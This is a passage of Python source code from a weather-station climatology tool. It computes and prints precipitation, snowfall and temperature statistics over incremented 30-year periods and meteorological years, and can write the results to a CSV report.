MIN","AVG", "MAX","MIN","DAYS","DAYS MAX","AVG", "MAX")) # Y PD PDx PDn PA PM Pmin SD SDx SA SM print("{:-^9} {:-^12} {:-^9} {:-^9} {:-^6} {:-^12} {:-^12} | {:-^11} {:-^9} {:-^6} {:-^11} |".format("","","","","","","","","","","")) print("{:^9} {:5}:{:>5}% {:>3}, {:^4} {:>3}, {:^4} {:^6.2f} {:>6.2f}, {:^4} {:>6.2f}, {:^4} | {:4}:{:>5}% {:>3}, {:^4} {:^6.1f} {:>5.1f}, {:^4} |".format("All Time", alltime["prcpPROP"]["days"], round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1), alltime["prcpPROP"]["season_max_days"][0], alltime["prcpPROP"]["season_max_days"][1][0] if len(alltime["prcpPROP"]["season_max_days"][1]) == 1 else len(alltime["prcpPROP"]["season_max_days"][1]), alltime["prcpPROP"]["season_min_days"][0], alltime["prcpPROP"]["season_min_days"][1][0] if len(alltime["prcpPROP"]["season_min_days"][1]) == 1 else len(alltime["prcpPROP"]["season_min_days"][1]), round(mean(alltime["prcp"]),2) if len(alltime["prcp"]) > 0 else "--", round(alltime["prcpPROP"]["season_max"][0],2), alltime["prcpPROP"]["season_max"][1][0] if len(alltime["prcpPROP"]["season_max"][1]) == 1 else len(alltime["prcpPROP"]["season_max"][1]), round(alltime["prcpPROP"]["season_min"][0],2), alltime["prcpPROP"]["season_min"][1][0] if len(alltime["prcpPROP"]["season_min"][1]) == 1 else len(alltime["prcpPROP"]["season_min"][1]), alltime["snowPROP"]["days"] if alltime["snowPROP"]["days"] > 0 else "--", round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1) if alltime["snowPROP"]["days"] > 0 else "--", alltime["snowPROP"]["season_max_days"][0], alltime["snowPROP"]["season_max_days"][1][0] if len(alltime["snowPROP"]["season_max_days"][1]) == 1 else len(alltime["snowPROP"]["season_max_days"][1]), round(mean(alltime["snow"]),1) if len(alltime["snow"]) > 0 else "--", round(alltime["snowPROP"]["season_max"][0],2), alltime["snowPROP"]["season_max"][1][0] if len(alltime["snowPROP"]["season_max"][1]) == 1 else len(alltime["snowPROP"]["season_max"][1]))) for c in climo30yrs: #print(climo30yrs[c]["prcpPROP"]["days"],climo30yrs[c]["total_days"]) #print(climo30yrs[c]["snowPROP"]["days"],climo30yrs[c]["total_days"]) try: print("{:^9} {:5}:{:>5}% {:>3}, {:^4} {:>3}, {:^4} {:^6.2f} {:>6.2f}, {:^4} {:>6.2f}, {:^4} | {:4}:{:>5}% {:>3}, {:^4} {:^6.1f} {:>5.1f}, {:^4} |".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), climo30yrs[c]["prcpPROP"]["days"], round(100 * climo30yrs[c]["prcpPROP"]["days"] / climo30yrs[c]["total_days"],1), climo30yrs[c]["prcpPROP"]["season_max_days"][0], climo30yrs[c]["prcpPROP"]["season_max_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["season_max_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["season_max_days"][1]), climo30yrs[c]["prcpPROP"]["season_min_days"][0], climo30yrs[c]["prcpPROP"]["season_min_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["season_min_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["season_min_days"][1]), round(mean(climo30yrs[c]["prcp"]),2), round(climo30yrs[c]["prcpPROP"]["season_max"][0],2), climo30yrs[c]["prcpPROP"]["season_max"][1][0] if len(climo30yrs[c]["prcpPROP"]["season_max"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["season_max"][1]), round(climo30yrs[c]["prcpPROP"]["season_min"][0],2), climo30yrs[c]["prcpPROP"]["season_min"][1][0] if len(climo30yrs[c]["prcpPROP"]["season_min"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["season_min"][1]), climo30yrs[c]["snowPROP"]["days"] if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", round(100 * climo30yrs[c]["snowPROP"]["days"] / climo30yrs[c]["total_days"],1) if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", climo30yrs[c]["snowPROP"]["season_max_days"][0], climo30yrs[c]["snowPROP"]["season_max_days"][1][0] if len(climo30yrs[c]["snowPROP"]["season_max_days"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["season_max_days"][1]), round(mean(climo30yrs[c]["snow"]),1) if len(climo30yrs[c]["snow"]) > 0 else "--", round(climo30yrs[c]["snowPROP"]["season_max"][0],2), climo30yrs[c]["snowPROP"]["season_max"][1][0] if len(climo30yrs[c]["snowPROP"]["season_max"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["season_max"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("\nPart 2: Temperature Stats") print("{:▒^9} {:▒^37} | {:▒^37} | {:▒^37}".format("Years","AVG TEMP","TMAX","TMIN")) print("{:▒^9} {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12}".format("","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN")) # Y TSTDV TMA TMX TMn TSTDV TMA TMX TMn TSTDV TMA TMX TMn # "tempAVGlist": [],"tavgPROP":{"season_max":[-999,[]],"season_min":[999,[]]}, print("{:-^9} {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12}".format("","","","","","","","","","","","","")) print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format("All Time", round(pstdev(alltime["tempAVGlist"]),1), round(mean(alltime["tempAVGlist_ind"]),1), round(alltime["tavgPROP"]["season_max"][0],1), alltime["tavgPROP"]["season_max"][1][0] if len(alltime["tavgPROP"]["season_max"][1]) == 1 else len(alltime["tavgPROP"]["season_max"][1]), round(alltime["tavgPROP"]["season_min"][0],1), alltime["tavgPROP"]["season_min"][1][0] if len(alltime["tavgPROP"]["season_min"][1]) == 1 else len(alltime["tavgPROP"]["season_min"][1]), round(pstdev(alltime["tmax"]),1), round(mean(alltime["tmax"]),1), round(alltime["tmaxPROP"]["season_max"][0],1), alltime["tmaxPROP"]["season_max"][1][0] if len(alltime["tmaxPROP"]["season_max"][1]) == 1 else len(alltime["tmaxPROP"]["season_max"][1]), round(alltime["tmaxPROP"]["season_min"][0],1), alltime["tmaxPROP"]["season_min"][1][0] if len(alltime["tmaxPROP"]["season_min"][1]) == 1 else len(alltime["tmaxPROP"]["season_min"][1]), round(pstdev(alltime["tmin"]),1), round(mean(alltime["tmin"]),1), round(alltime["tminPROP"]["season_max"][0],1), alltime["tminPROP"]["season_max"][1][0] if len(alltime["tminPROP"]["season_max"][1]) == 1 else len(alltime["tminPROP"]["season_max"][1]), round(alltime["tminPROP"]["season_min"][0],1), alltime["tminPROP"]["season_min"][1][0] if len(alltime["tminPROP"]["season_min"][1]) == 1 else len(alltime["tminPROP"]["season_min"][1]))) for c in climo30yrs: try: print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), round(pstdev(climo30yrs[c]["tempAVGlist"]),1), round(mean(climo30yrs[c]["tempAVGlist_ind"]),1), round(climo30yrs[c]["tavgPROP"]["season_max"][0],1), climo30yrs[c]["tavgPROP"]["season_max"][1][0] if len(climo30yrs[c]["tavgPROP"]["season_max"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["season_max"][1]), round(climo30yrs[c]["tavgPROP"]["season_min"][0],1), climo30yrs[c]["tavgPROP"]["season_min"][1][0] if len(climo30yrs[c]["tavgPROP"]["season_min"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["season_min"][1]), round(pstdev(climo30yrs[c]["tmax"]),1), round(mean(climo30yrs[c]["tmax"]),1), round(climo30yrs[c]["tmaxPROP"]["season_max"][0],1), climo30yrs[c]["tmaxPROP"]["season_max"][1][0] if len(climo30yrs[c]["tmaxPROP"]["season_max"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["season_max"][1]), round(climo30yrs[c]["tmaxPROP"]["season_min"][0],1), climo30yrs[c]["tmaxPROP"]["season_min"][1][0] if len(climo30yrs[c]["tmaxPROP"]["season_min"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["season_min"][1]), round(pstdev(climo30yrs[c]["tmin"]),1), round(mean(climo30yrs[c]["tmin"]),1), round(climo30yrs[c]["tminPROP"]["season_max"][0],1), climo30yrs[c]["tminPROP"]["season_max"][1][0] if len(climo30yrs[c]["tminPROP"]["season_max"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["season_max"][1]), round(climo30yrs[c]["tminPROP"]["season_min"][0],1), climo30yrs[c]["tminPROP"]["season_min"][1][0] if len(climo30yrs[c]["tminPROP"]["season_min"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["season_min"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("") if output == True: newfn = "seasonReport_met" + season.lower().capitalize() + "_" + str(climatology) + "YRclimo_" + str(increment) + "YRincr_" + clmt["station_name"] + ".csv" with open(newfn,"w") as w: headers = ["Assessed Period (Meteorological {})".format(season.lower().capitalize()),"PRCP Days","PRCP % of days","PRCP stdev","PRCP AVG","SNOW Days","SNOW % of days","SNOW stdev","SNOW AVG","TAVG stdev","TAVG","TMAX stdev","TMAX","TMIN stdev","TMIN"] # HEADER for x in range(len(headers)): if x != len(headers) - 1: w.write(headers[x]); w.write(",") else: w.write(headers[x]); w.write("\n") w.write("{}-{}".format(alltime["years"][0],alltime["years"][1])); w.write(",") w.write("{}".format(alltime["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["prcp"]),1))); w.write(",") w.write("{}".format(alltime["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tempAVGlist"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tempAVGlist_ind"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmax"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tmax"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmin"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tmin"]))); w.write("\n") for x in climo30yrs: w.write("{}-{}".format(climo30yrs[x]["years"][0],climo30yrs[x]["years"][1])); w.write(",") w.write("{}".format(climo30yrs[x]["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["prcpPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{}".format(climo30yrs[x]["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["snowPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tempAVGlist"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tempAVGlist_ind"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmax"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tmax"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmin"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tmin"]))); w.write("\n") print("*** csv output successful ***") def metYearReport(climatology=30,increment=5,output=False): """Detailed Climatological Report all Meteorological years on record. A meteorological year goes from March to February of the following year. * no required arguments * Keyword Args (optional): climatology = 30: The span of years that averages are calculated for (ie. '30 year climatology' or '30 year average'). This can be modified but should always be > the increment. increment = 5: Tells the script how often to assess/record successive climatologies. The smaller this is, the longer the report takes to generate. If kept at the default, for example, it would capture the 1976-2005, 1981-2010, and 1986-2015 climatologies and so forth. output = False: If set to True, the script will output a CSV file of its findings. This could be opened in a spreadsheet program for further analysis Examples: metYearReport() -> Returns a 30-yr, 5-yr incremented climatological report for all meteorological years on record metYearReport(climatology=10) -> Returns a 10-yr, 5-yr incremented climatological report for all Meteorological years. metYearReport(climatology=10,increment=4,output=True) -> Returns a 4-yr incremented, 10yr climatology report for all years and outputs a CSV. """ valid_yrs = list(range(min([x for x in clmt.keys() if type(x) == int]),max([x for x in clmt.keys() if type(x) == int])+1)) #valid_yrs = [x for x in metclmt.keys() if type(x) == int] valid_yrs.sort() climo30yrs = {} for x in range(1811,max(valid_yrs)+1,increment): if x in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]) and x+climatology-1 in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]+1): climo30yrs[(x,x+climatology-1)] = {"years":(x,x+climatology-1),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"year_max_days":[-1,[]],"year_min_days":[999,[]],"year_max":[-1,[]],"year_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"year_max_days":[-1,[]],"year_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, "tmax": [],"tmaxPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, "tmin": [],"tminPROP":{"year_max":[-999,[]],"year_min":[999,[]]}} alltime = {"years":(valid_yrs[0],valid_yrs[len(valid_yrs)-1]),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"year_max_days":[-1,[]],"year_min_days":[999,[]],"year_max":[-1,[]],"year_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"year_max_days":[-1,[]],"year_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, "tmax": [],"tmaxPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, "tmin": [],"tminPROP":{"year_max":[-999,[]],"year_min":[999,[]]}} print("*** PLEASE WAIT. This will take a few moments ***") for y in valid_yrs: # 'recordqty', 'prcp', 'prcpDAYS', 'prcpPROP', 'snow', 'snowDAYS', 'snowPROP', 'tempAVGlist', 'tmax', 'tmaxPROP', 'tmin', 'tminPROP' alltime["total_days"] += metclmt[y]["recordqty"] # PRCP alltime["prcp"].append(sum(metclmt[y]["prcp"])) alltime["prcpPROP"]["days"] += metclmt[y]["prcpDAYS"] if metclmt[y]["prcpDAYS"] == alltime["prcpPROP"]["year_max_days"][0]: alltime["prcpPROP"]["year_max_days"][1].append(y) elif metclmt[y]["prcpDAYS"] > alltime["prcpPROP"]["year_max_days"][0]: alltime["prcpPROP"]["year_max_days"][0] = metclmt[y]["prcpDAYS"] alltime["prcpPROP"]["year_max_days"][1] = [] alltime["prcpPROP"]["year_max_days"][1].append(y) if sum(metclmt[y]["prcp"]) == alltime["prcpPROP"]["year_max"][0]: alltime["prcpPROP"]["year_max"][1].append(y) elif sum(metclmt[y]["prcp"]) > alltime["prcpPROP"]["year_max"][0]: alltime["prcpPROP"]["year_max"][0] = sum(metclmt[y]["prcp"]) alltime["prcpPROP"]["year_max"][1] = [] alltime["prcpPROP"]["year_max"][1].append(y) if metclmt[y]["recordqty"] > excludeyear: if metclmt[y]["prcpDAYS"] == alltime["prcpPROP"]["year_min_days"][0]: alltime["prcpPROP"]["year_min_days"][1].append(y) elif metclmt[y]["prcpDAYS"] < alltime["prcpPROP"]["year_min_days"][0]: alltime["prcpPROP"]["year_min_days"][0] = metclmt[y]["prcpDAYS"] alltime["prcpPROP"]["year_min_days"][1] = [] alltime["prcpPROP"]["year_min_days"][1].append(y) if sum(metclmt[y]["prcp"]) == alltime["prcpPROP"]["year_min"][0]: alltime["prcpPROP"]["year_min"][1].append(y) elif sum(metclmt[y]["prcp"]) < alltime["prcpPROP"]["year_min"][0]: alltime["prcpPROP"]["year_min"][0] = sum(metclmt[y]["prcp"]) alltime["prcpPROP"]["year_min"][1] = [] alltime["prcpPROP"]["year_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): climo30yrs[c]["prcp"].append(sum(metclmt[y]["prcp"])) climo30yrs[c]["prcpPROP"]["days"] += metclmt[y]["prcpDAYS"] climo30yrs[c]["total_days"] += metclmt[y]["recordqty"] if metclmt[y]["recordqty"] > excludeyear: if metclmt[y]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["year_max_days"][0]: climo30yrs[c]["prcpPROP"]["year_max_days"][1].append(y) elif metclmt[y]["prcpDAYS"] > climo30yrs[c]["prcpPROP"]["year_max_days"][0]: climo30yrs[c]["prcpPROP"]["year_max_days"][0] = metclmt[y]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["year_max_days"][1] = [] climo30yrs[c]["prcpPROP"]["year_max_days"][1].append(y) if metclmt[y]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["year_min_days"][0]: climo30yrs[c]["prcpPROP"]["year_min_days"][1].append(y) elif metclmt[y]["prcpDAYS"] < climo30yrs[c]["prcpPROP"]["year_min_days"][0]: climo30yrs[c]["prcpPROP"]["year_min_days"][0] = metclmt[y]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["year_min_days"][1] = [] climo30yrs[c]["prcpPROP"]["year_min_days"][1].append(y) if sum(metclmt[y]["prcp"]) == climo30yrs[c]["prcpPROP"]["year_max"][0]: climo30yrs[c]["prcpPROP"]["year_max"][1].append(y) elif sum(metclmt[y]["prcp"]) > climo30yrs[c]["prcpPROP"]["year_max"][0]: climo30yrs[c]["prcpPROP"]["year_max"][0] = sum(metclmt[y]["prcp"]) climo30yrs[c]["prcpPROP"]["year_max"][1] = [] climo30yrs[c]["prcpPROP"]["year_max"][1].append(y) if sum(metclmt[y]["prcp"]) == climo30yrs[c]["prcpPROP"]["year_min"][0]: climo30yrs[c]["prcpPROP"]["year_min"][1].append(y) elif sum(metclmt[y]["prcp"]) < climo30yrs[c]["prcpPROP"]["year_min"][0]: climo30yrs[c]["prcpPROP"]["year_min"][0] = sum(metclmt[y]["prcp"]) climo30yrs[c]["prcpPROP"]["year_min"][1] = [] climo30yrs[c]["prcpPROP"]["year_min"][1].append(y) # SNOW alltime["snow"].append(sum(metclmt[y]["snow"])) alltime["snowPROP"]["days"] += metclmt[y]["snowDAYS"] if metclmt[y]["recordqty"] > excludeyear: if metclmt[y]["snowDAYS"] == alltime["snowPROP"]["year_max_days"][0]: alltime["snowPROP"]["year_max_days"][1].append(y) elif metclmt[y]["snowDAYS"] > alltime["snowPROP"]["year_max_days"][0]: alltime["snowPROP"]["year_max_days"][0] = metclmt[y]["snowDAYS"] alltime["snowPROP"]["year_max_days"][1] = [] alltime["snowPROP"]["year_max_days"][1].append(y) if sum(metclmt[y]["snow"]) == alltime["snowPROP"]["year_max"][0]: alltime["snowPROP"]["year_max"][1].append(y) elif sum(metclmt[y]["snow"]) > alltime["snowPROP"]["year_max"][0]: alltime["snowPROP"]["year_max"][0] = sum(metclmt[y]["snow"]) alltime["snowPROP"]["year_max"][1] = [] alltime["snowPROP"]["year_max"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): climo30yrs[c]["snow"].append(sum(metclmt[y]["snow"])) climo30yrs[c]["snowPROP"]["days"] += metclmt[y]["snowDAYS"] if metclmt[y]["recordqty"] > excludeyear: if metclmt[y]["snowDAYS"] == climo30yrs[c]["snowPROP"]["year_max_days"][0]: climo30yrs[c]["snowPROP"]["year_max_days"][1].append(y) elif metclmt[y]["snowDAYS"] > climo30yrs[c]["snowPROP"]["year_max_days"][0]: climo30yrs[c]["snowPROP"]["year_max_days"][0] = metclmt[y]["snowDAYS"] climo30yrs[c]["snowPROP"]["year_max_days"][1] = [] climo30yrs[c]["snowPROP"]["year_max_days"][1].append(y) if sum(metclmt[y]["snow"]) == climo30yrs[c]["snowPROP"]["year_max"][0]: climo30yrs[c]["snowPROP"]["year_max"][1].append(y) elif sum(metclmt[y]["snow"]) > climo30yrs[c]["snowPROP"]["year_max"][0]: climo30yrs[c]["snowPROP"]["year_max"][0] = sum(metclmt[y]["snow"]) climo30yrs[c]["snowPROP"]["year_max"][1] = [] climo30yrs[c]["snowPROP"]["year_max"][1].append(y) # 'recordqty', 'prcp', 'prcpDAYS', 'prcpPROP', 'snow', 'snowDAYS', 'snowPROP', 'tempAVGlist', 'tmax', 'tmaxPROP', 'tmin', 'tminPROP' # TAVG for x in metclmt[y]["tempAVGlist"]: alltime["tempAVGlist_ind"].append(x) if len(metclmt[y]["tempAVGlist"]) > excludeyear_tavg: alltime["tempAVGlist"].append(mean(metclmt[y]["tempAVGlist"])) if mean(metclmt[y]["tempAVGlist"]) == alltime["tavgPROP"]["year_max"][0]: alltime["tavgPROP"]["year_max"][1].append(y) elif mean(metclmt[y]["tempAVGlist"]) > alltime["tavgPROP"]["year_max"][0]: alltime["tavgPROP"]["year_max"][0] = mean(metclmt[y]["tempAVGlist"]) alltime["tavgPROP"]["year_max"][1] = [] alltime["tavgPROP"]["year_max"][1].append(y) if mean(metclmt[y]["tempAVGlist"]) == alltime["tavgPROP"]["year_min"][0]: alltime["tavgPROP"]["year_min"][1].append(y) elif mean(metclmt[y]["tempAVGlist"]) < alltime["tavgPROP"]["year_min"][0]: alltime["tavgPROP"]["year_min"][0] = mean(metclmt[y]["tempAVGlist"]) alltime["tavgPROP"]["year_min"][1] = [] alltime["tavgPROP"]["year_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): for x in metclmt[y]["tempAVGlist"]:climo30yrs[c]["tempAVGlist_ind"].append(x) if len(metclmt[y]["tempAVGlist"]) > excludeyear_tavg: climo30yrs[c]["tempAVGlist"].append(mean(metclmt[y]["tempAVGlist"])) if mean(metclmt[y]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["year_max"][0]: climo30yrs[c]["tavgPROP"]["year_max"][1].append(y) elif mean(metclmt[y]["tempAVGlist"]) > climo30yrs[c]["tavgPROP"]["year_max"][0]: climo30yrs[c]["tavgPROP"]["year_max"][0] = mean(metclmt[y]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["year_max"][1] = [] climo30yrs[c]["tavgPROP"]["year_max"][1].append(y) if mean(metclmt[y]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["year_min"][0]: climo30yrs[c]["tavgPROP"]["year_min"][1].append(y) elif mean(metclmt[y]["tempAVGlist"]) < climo30yrs[c]["tavgPROP"]["year_min"][0]: climo30yrs[c]["tavgPROP"]["year_min"][0] = mean(metclmt[y]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["year_min"][1] = [] climo30yrs[c]["tavgPROP"]["year_min"][1].append(y) # TMAX for x in metclmt[y]["tmax"]: alltime["tmax"].append(x) if len(metclmt[y]["tmax"]) > excludeyear: if mean(metclmt[y]["tmax"]) == alltime["tmaxPROP"]["year_max"][0]: alltime["tmaxPROP"]["year_max"][1].append(y) elif mean(metclmt[y]["tmax"]) > alltime["tmaxPROP"]["year_max"][0]: alltime["tmaxPROP"]["year_max"][0] = mean(metclmt[y]["tmax"]) alltime["tmaxPROP"]["year_max"][1] = [] alltime["tmaxPROP"]["year_max"][1].append(y) if mean(metclmt[y]["tmax"]) == alltime["tmaxPROP"]["year_min"][0]: alltime["tmaxPROP"]["year_min"][1].append(y) elif mean(metclmt[y]["tmax"]) < alltime["tmaxPROP"]["year_min"][0]: alltime["tmaxPROP"]["year_min"][0] = mean(metclmt[y]["tmax"]) alltime["tmaxPROP"]["year_min"][1] = [] alltime["tmaxPROP"]["year_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): for x in metclmt[y]["tmax"]: climo30yrs[c]["tmax"].append(x) if len(metclmt[y]["tmax"]) > excludeyear: if mean(metclmt[y]["tmax"]) == climo30yrs[c]["tmaxPROP"]["year_max"][0]: climo30yrs[c]["tmaxPROP"]["year_max"][1].append(y) elif mean(metclmt[y]["tmax"]) > climo30yrs[c]["tmaxPROP"]["year_max"][0]: climo30yrs[c]["tmaxPROP"]["year_max"][0] = mean(metclmt[y]["tmax"]) climo30yrs[c]["tmaxPROP"]["year_max"][1] = [] climo30yrs[c]["tmaxPROP"]["year_max"][1].append(y) if mean(metclmt[y]["tmax"]) == climo30yrs[c]["tmaxPROP"]["year_min"][0]: climo30yrs[c]["tmaxPROP"]["year_min"][1].append(y) elif mean(metclmt[y]["tmax"]) < climo30yrs[c]["tmaxPROP"]["year_min"][0]: climo30yrs[c]["tmaxPROP"]["year_min"][0] = mean(metclmt[y]["tmax"]) climo30yrs[c]["tmaxPROP"]["year_min"][1] = [] climo30yrs[c]["tmaxPROP"]["year_min"][1].append(y) # TMIN for x in metclmt[y]["tmin"]: alltime["tmin"].append(x) if len(metclmt[y]["tmin"]) > excludeyear: if mean(metclmt[y]["tmin"]) == alltime["tminPROP"]["year_max"][0]: alltime["tminPROP"]["year_max"][1].append(y) elif mean(metclmt[y]["tmin"]) > alltime["tminPROP"]["year_max"][0]: alltime["tminPROP"]["year_max"][0] = mean(metclmt[y]["tmin"]) alltime["tminPROP"]["year_max"][1] = [] alltime["tminPROP"]["year_max"][1].append(y) if mean(metclmt[y]["tmin"]) == alltime["tminPROP"]["year_min"][0]: alltime["tminPROP"]["year_min"][1].append(y) elif mean(metclmt[y]["tmin"]) < alltime["tminPROP"]["year_min"][0]: alltime["tminPROP"]["year_min"][0] = mean(metclmt[y]["tmin"]) alltime["tminPROP"]["year_min"][1] = [] alltime["tminPROP"]["year_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in metclmt if type(YR) == int) and c[1] <= max(YR for YR in metclmt if type(YR) == int): for x in metclmt[y]["tmin"]: climo30yrs[c]["tmin"].append(x) if len(metclmt[y]["tmin"]) > excludeyear: if mean(metclmt[y]["tmin"]) == climo30yrs[c]["tminPROP"]["year_max"][0]: climo30yrs[c]["tminPROP"]["year_max"][1].append(y) elif mean(metclmt[y]["tmin"]) > climo30yrs[c]["tminPROP"]["year_max"][0]: climo30yrs[c]["tminPROP"]["year_max"][0] = mean(metclmt[y]["tmin"]) climo30yrs[c]["tminPROP"]["year_max"][1] = [] climo30yrs[c]["tminPROP"]["year_max"][1].append(y) if mean(metclmt[y]["tmin"]) == climo30yrs[c]["tminPROP"]["year_min"][0]: climo30yrs[c]["tminPROP"]["year_min"][1].append(y) elif mean(metclmt[y]["tmin"]) < climo30yrs[c]["tminPROP"]["year_min"][0]: climo30yrs[c]["tminPROP"]["year_min"][0] = mean(metclmt[y]["tmin"]) climo30yrs[c]["tminPROP"]["year_min"][1] = [] climo30yrs[c]["tminPROP"]["year_min"][1].append(y) # PRINT REPORT print("---------------------------------------------------") print("Climatology Report for All Meteorological Years on Record") print("City: {}, {}".format(metclmt["station"],metclmt["station_name"])) print("{}-{}; {}-Year Incremented {}-Year Climatologies".format(min(valid_yrs),max(valid_yrs),increment,climatology)) print("---------------------------------------------------") print("Part 1: Precipitation Stats") print("{:▒^9} {:▒^12} {:▒^9} {:▒^9} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^9} {:▒^6} {:▒^11} |".format("Years","PRCP","PRCP","PRCP","PRCP","PRCP","PRCP","SNOW","SNOW","SNOW","SNOW")) print("{:▒^9} {:▒^12} {:▒^9} {:▒^9} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^9} {:▒^6} {:▒^11} |".format("","DAYS","DAYS MAX","DAYS MIN","AVG", "MAX","MIN","DAYS","DAYS MAX","AVG", "MAX")) # Y PD PDx PDn PA PM Pmin SD SDx SA SM print("{:-^9} {:-^12} {:-^9} {:-^9} {:-^6} {:-^12} {:-^12} | {:-^11} {:-^9} {:-^6} {:-^11} |".format("","","","","","","","","","","")) print("{:^9} {:5}:{:>5}% {:>3}, {:^4} {:>3}, {:^4} {:^6.2f} {:>6.2f}, {:^4} {:>6.2f}, {:^4} | {:4}:{:>5}% {:>3}, {:^4} {:^6.1f} {:>5.1f}, {:^4} |".format("All Time", alltime["prcpPROP"]["days"], round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1), alltime["prcpPROP"]["year_max_days"][0], alltime["prcpPROP"]["year_max_days"][1][0] if len(alltime["prcpPROP"]["year_max_days"][1]) == 1 else 